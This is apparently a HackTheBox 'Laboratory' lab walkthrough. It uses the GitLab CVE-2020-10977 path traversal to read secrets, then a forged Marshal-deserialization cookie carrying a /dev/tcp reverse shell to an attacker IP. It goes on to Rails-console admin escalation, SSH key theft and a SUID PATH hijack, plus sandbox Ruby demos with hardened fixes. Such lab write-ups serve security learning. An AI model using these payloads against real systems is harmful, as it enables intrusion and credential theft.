
HackTheBox Laboratory

1. Info

  • IP : 10.10.10.216
  • OS : Linux
  • Difficulty : Easy

2. Nmap

  • Payload: sudo nmap -sV 10.10.10.216 -oA nmap/10.10.10.216
  • Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
  • Port 80: Apache httpd 2.4.41
  • Port 443: Apache/2.4.41
    • ssl-cert: Subject: commonName=laboratory.htb
  • No directly exploitable CVE for these service versions

3. Web Server

  • View: (screenshot)
  • The web server redirects us to laboratory.htb
  • Add laboratory.htb to /etc/hosts (screenshot)
  • View: (screenshot)
  • Gobuster
    • Payload: gobuster dir -u "https://laboratory.htb/" -w ../../../文件/SecLists/Discovery/Web-Content/raft-small-words.txt -x html
    • Output: unable to connect to https://laboratory.htb/: invalid certificate: x509: certificate is valid for git.laboratory.htb, not laboratory.htb (screenshot)
    • Re-run Gobuster with -k (--no-tls-validation) to skip certificate verification (-t sets the thread count, it does not affect certificate checking)
    • The certificate error leaks a second vhost: add git.laboratory.htb to /etc/hosts
    • Nothing interesting from Gobuster against laboratory.htb

4. Web Server (GitLab)

  • View: (screenshot)
  • Sign up
    • Try an ordinary email address: fails (screenshot), which suggests sign-up is restricted to an allowlisted email domain
    • Try laboratory@htb: success (screenshot)
  • Explore GitLab
    • Project SecureWebsite
      • Author: Dexter McPherson
      • Internal project (screenshot)
      • The project has no branches
      • The project's index.html matches the page served at https://laboratory.htb/
      • Issue:
        • Created by Seven (screenshot)
        • Only an HTTP 418 ("I'm a teapot") joke; nothing useful
    • GitLab server
      • Version: GitLab Community Edition 12.8.1
      • Google it! (screenshot)
      • CVE-2020-10977

5. Exploit GitLab Server (CVE-2020-10977)

  • CVE Info:
    • CVE Number: CVE-2020-10977
    • Affected versions: GitLab EE/CE 8.5 through 12.9 (fixed in 12.9.1, 12.8.8 and 12.7.9)
    • CVE Description: GitLab EE/CE 8.5 to 12.9 is vulnerable to a path traversal when moving an issue between projects. (From NVD)
  • Vulnerable Code (/opt/gitlab/embedded/service/gitlab-rails/lib/gitlab/gfm/uploads_rewriter.rb):
    # Rewrites every upload link in the issue text; $~ holds the current match of @pattern
    @text.gsub(@pattern) do |markdown|
      # secret and file come straight from the markdown the user wrote
      file = find_file(@source_project, $~[:secret], $~[:file])
      break markdown unless file.try(:exists?)

      klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
      # copies whatever `file` resolved to into the target project's uploads
      moved = klass.copy_to(file, target_parent)
    ...
    def find_file(project, secret, file)
      uploader = FileUploader.new(project, secret: secret)
      # no normalisation: "../" sequences in `file` walk out of the upload directory
      uploader.retrieve_from_store!(file)
      uploader
    end
    ...
    # the <file> group is unrestricted ((?<file>.*?)), so traversal sequences match
    MARKDOWN_PATTERN = %r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze
  • Exploit LFI:
    • Requires a valid GitLab username and password (the account registered above)
    • Exploit PoC: cve-2020-10977.py
    • Payload: python3 cve_2020_10977.py https://git.laboratory.htb user passwd (screenshot)
    • Enter an absolute path to read a local file; GitLab copies it into the target project's uploads and serves it back (screenshot)
    • PoC analysis:
      • Create 2 projects (screenshot)
      • Create an issue in the first project (screenshot)
      • Issue data (screenshot)
      • Issue description (filename must start with /):
        • '![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})'.format(filename)
      • Move the issue to the second project: the rewriter resolves the traversal path, copies the file under a new secret in the target project, and rewrites the link to point at the copy (screenshot)
  • Exploit RCE
    • Need the same GitLab version on the attacker machine to forge a signed cookie
    • Build GitLab with Docker: sudo docker run gitlab/gitlab-ce:12.8.1-ce.0
    • Enter the container shell: sudo docker exec -it <container_name> bash (name from docker ps)
    • Get secret_key_base from the lab's GitLab via the LFI:
      • Absolute path: /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
    • Set the Docker GitLab's secret_key_base to the lab's value, so cookies signed locally verify on the target:
      • Docker shell:
        • cd /etc/gitlab
        • vim gitlab.rb
        • Add gitlab_rails['secret_key_base'] = 'Lab_secret_key_base_here' (screenshot)
        • gitlab-ctl reconfigure
    • Start the GitLab Rails console in Docker: gitlab-rails console
    • Enter the payload in the Rails console (a Marshal deserialization gadget: a DeprecatedInstanceVariableProxy that calls ERB#result when the deserialized cookie is touched):
    # Build a request and cookie jar bound to the app's (now shared) secret_key_base
    request = ActionDispatch::Request.new(Rails.application.env_config)
    # Force Marshal so the gadget is serialized as a Ruby object graph
    request.env["action_dispatch.cookies_serializer"] = :marshal
    cookies = request.cookie_jar

    # ERB whose template spawns a reverse shell when #result is called
    erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.19/9001 0>&1'` %>")
    # Proxy that invokes erb.result as soon as the deserialized object is used
    depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
    # Sign it with secret_key_base; the target accepts it because the secret matches
    cookies.signed[:cookie] = depr
    # Print the signed value to send as the experimentation_subject_id cookie
    puts cookies[:cookie]

    • The console prints the signed cookie that carries the RCE payload (screenshot)
    • Attacker machine
      • Set up netcat: nc -lvnp 9001
      • Payload: curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=enter_rce_payload_here" -k
      • Percent-encode the cookie value before sending it: Rack unescapes cookie values, so a literal + in the Base64 becomes a space and the signature check fails (screenshot)
      • Get a shell as user git (screenshot)
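The traversal in the uploads rewriter quoted above, and the move step the PoC relies on, reproduced in a sandbox as an added example (this is not GitLab's code or the PoC's): the page's MARKDOWN_PATTERN is reused verbatim; find_file_unsafe models the unchecked join in find_file/retrieve_from_store!; rewrite_for_move models the copy-and-rewrite the issue move performs; find_file_safe is an assumed hardening written for illustration, not GitLab's actual patch. All directory names and file contents are constructed.

```ruby
require 'pathname'
require 'securerandom'
require 'fileutils'
require 'tmpdir'

# Same pattern as GitLab's uploads_rewriter.rb (quoted on the page): the
# <file> group is unrestricted, so "../" sequences are captured untouched.
MARKDOWN_PATTERN = %r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze

# Vulnerable lookup, modelled on find_file/retrieve_from_store!: secret and
# file are joined onto the project's upload directory with no normalisation.
def find_file_unsafe(uploads_dir, secret, file)
  File.expand_path(File.join(uploads_dir, secret, file))
end

# Hardened lookup (assumed fix for illustration, not GitLab's patch): the
# normalised path must stay inside <uploads_dir>/<secret>/.
def find_file_safe(uploads_dir, secret, file)
  return nil if file.include?("\0")
  base = File.expand_path(File.join(uploads_dir, secret))
  path = File.expand_path(file, base)
  path.start_with?(base + File::SEPARATOR) ? path : nil
end

# Models the move: each upload link is resolved in the source project, copied
# into the target project under a fresh secret, and the markdown is rewritten
# to point at the copy (which is how the leaked file becomes downloadable).
def rewrite_for_move(text, source_uploads, target_uploads, safe: false)
  text.gsub(MARKDOWN_PATTERN) do |markdown|
    secret, file = $~[:secret], $~[:file]
    src = safe ? find_file_safe(source_uploads, secret, file) :
                 find_file_unsafe(source_uploads, secret, file)
    next markdown unless src && File.file?(src)

    new_secret = SecureRandom.hex(16)
    dest_dir = File.join(target_uploads, new_secret)
    FileUtils.mkdir_p(dest_dir)
    FileUtils.cp(src, dest_dir)
    "![#{File.basename(src)}](/uploads/#{new_secret}/#{File.basename(src)})"
  end
end

# Sandbox run with constructed paths: a "secret" file outside any upload
# directory plus the two projects' upload directories. Returns whether the
# link was rewritten and whether the copy matches the secret file.
def demo(safe:)
  Dir.mktmpdir do |root|
    secret_file = File.join(root, 'etc', 'passwd')
    FileUtils.mkdir_p(File.dirname(secret_file))
    File.write(secret_file, "root:x:0:0:root:/root:/bin/bash\n") # constructed content

    src_uploads = File.join(root, 'uploads', 'jerry', 'src')
    dst_uploads = File.join(root, 'uploads', 'jerry', 'dst')
    FileUtils.mkdir_p([src_uploads, dst_uploads])

    # Issue description as in the PoC: a fake 32-hex secret followed by enough
    # "../" to climb out; here the climb is computed relative to the sandbox.
    fake_secret = '1' * 32
    climb = Pathname.new(secret_file)
                    .relative_path_from(Pathname.new(File.join(src_uploads, fake_secret))).to_s
    description = "![a](/uploads/#{fake_secret}/#{climb})"

    rewritten = rewrite_for_move(description, src_uploads, dst_uploads, safe: safe)
    m = rewritten.match(MARKDOWN_PATTERN)
    if m[:secret] == fake_secret
      { rewritten: false, leaked: false }
    else
      copied = File.join(dst_uploads, m[:secret], m[:file])
      { rewritten: true, leaked: File.read(copied) == File.read(secret_file) }
    end
  end
end

if __FILE__ == $0
  puts "vulnerable: #{demo(safe: false)}"
  puts "hardened:   #{demo(safe: true)}"
end
```

On the real box the upload directory sits several levels deep, which is why the PoC stacks fourteen "../"; File.expand_path clamps at the filesystem root, so over-shooting is harmless and the string resolves to the absolute path given.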

6. Privilege Escalation To User Dexter

  • Current Info:
    • Username: git
    • IP address: 172.17.0.2
    • Container: yes (Docker)
  • gitlab-rails
    • GitLab is a web application built on Ruby on Rails
    • The GitLab Rails console is for system administrators troubleshooting a problem or retrieving data that is only reachable through direct access to the GitLab application
    • From it we can read and modify user records
  • Get GitLab admin
    • Open the Rails console: gitlab-rails console (screenshot)
    • Look up our account: User.find_by(username: "your_username") (screenshot)
    • Set the user role to admin:
      user = User.find_by(username: "jerry")
      user.admin = true
      user.save

    • We now have admin access to GitLab
  • Explore GitLab
    • On the projects page there is another project created by @dexter
    • Exploring that project we find a .ssh directory with a private key (id_rsa)
  • Log in as Dexter over SSH
    • Copy the id_rsa file to the attacker machine
    • Log in as dexter with the id_rsa key

7. Privilege Escalation To Root

  • Enum
    • Run linpeas.sh
    • An unusual listener on port 60080
      • curl 127.0.0.1:60080 -L
      • Looks like the GitLab server
      • Nothing to do here
    • Interesting path
      • Found an unknown SUID binary: docker-security
  • Privilege Escalation To Root
    • Analyze docker-security
      • ltrace docker-security
      • docker-security sets uid and gid to 0 (root), then runs chmod by bare name, so it is looked up through $PATH
      • A fake chmod placed earlier in $PATH therefore runs as root
    • Exploit
      • Pick a writable directory (/tmp/bin)
      • Create a shell script named chmod there and make it executable (chmod +x, before changing PATH)
      • Prepend it to $PATH: export PATH=/tmp/bin:$PATH
      • Run docker-security
      • Get root!
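The PATH hijack against docker-security, reproduced in Ruby as an added example (not the box's binary or the author's script): run_chmod_via_path models a privileged program invoking chmod by bare name, plant_fake_chmod is the attacker's stand-in for the script dropped in /tmp/bin (it writes a marker instead of spawning a shell), and run_chmod_absolute is the fix. A temporary directory stands in for /tmp/bin; nothing here is setuid, so the demo shows only which chmod gets executed.

```ruby
require 'tmpdir'
require 'fileutils'

# Plant a fake chmod in a writable directory (the page used /tmp/bin). Here it
# only records who ran it; the real exploit would spawn a root shell.
def plant_fake_chmod(bin_dir, marker)
  path = File.join(bin_dir, 'chmod')
  File.write(path, "#!/bin/sh\necho \"fake chmod ran as uid $(id -u)\" > '#{marker}'\n")
  File.chmod(0o755, path)
  path
end

# What ltrace showed docker-security doing: after setuid(0)/setgid(0) it runs
# chmod by bare name, so it is resolved through the caller's $PATH.
def run_chmod_via_path(target)
  system('chmod', '700', target)
end

# Hardened variant: an absolute path cannot be redirected by $PATH.
def run_chmod_absolute(target)
  system('/bin/chmod', '700', target)
end

# Returns true when the planted chmod was the one executed.
def hijack_succeeds?(use_absolute_path:)
  Dir.mktmpdir do |root|
    bin = File.join(root, 'bin')
    FileUtils.mkdir_p(bin)
    marker = File.join(root, 'pwned')
    plant_fake_chmod(bin, marker)
    target = File.join(root, 'victim')
    File.write(target, '')

    saved = ENV['PATH']
    ENV['PATH'] = "#{bin}:#{saved}" # same effect as: export PATH=/tmp/bin:$PATH
    begin
      use_absolute_path ? run_chmod_absolute(target) : run_chmod_via_path(target)
    ensure
      ENV['PATH'] = saved
    end
    File.exist?(marker)
  end
end

if __FILE__ == $0
  puts "bare 'chmod' hijacked:     #{hijack_succeeds?(use_absolute_path: false)}"
  puts "'/bin/chmod' hijacked:     #{hijack_succeeds?(use_absolute_path: true)}"
end
```

A C program using system("chmod ...") is in the same position: /bin/sh -c resolves the bare name through the inherited PATH, which is why a setuid binary should either call the absolute path or reset PATH before spawning anything.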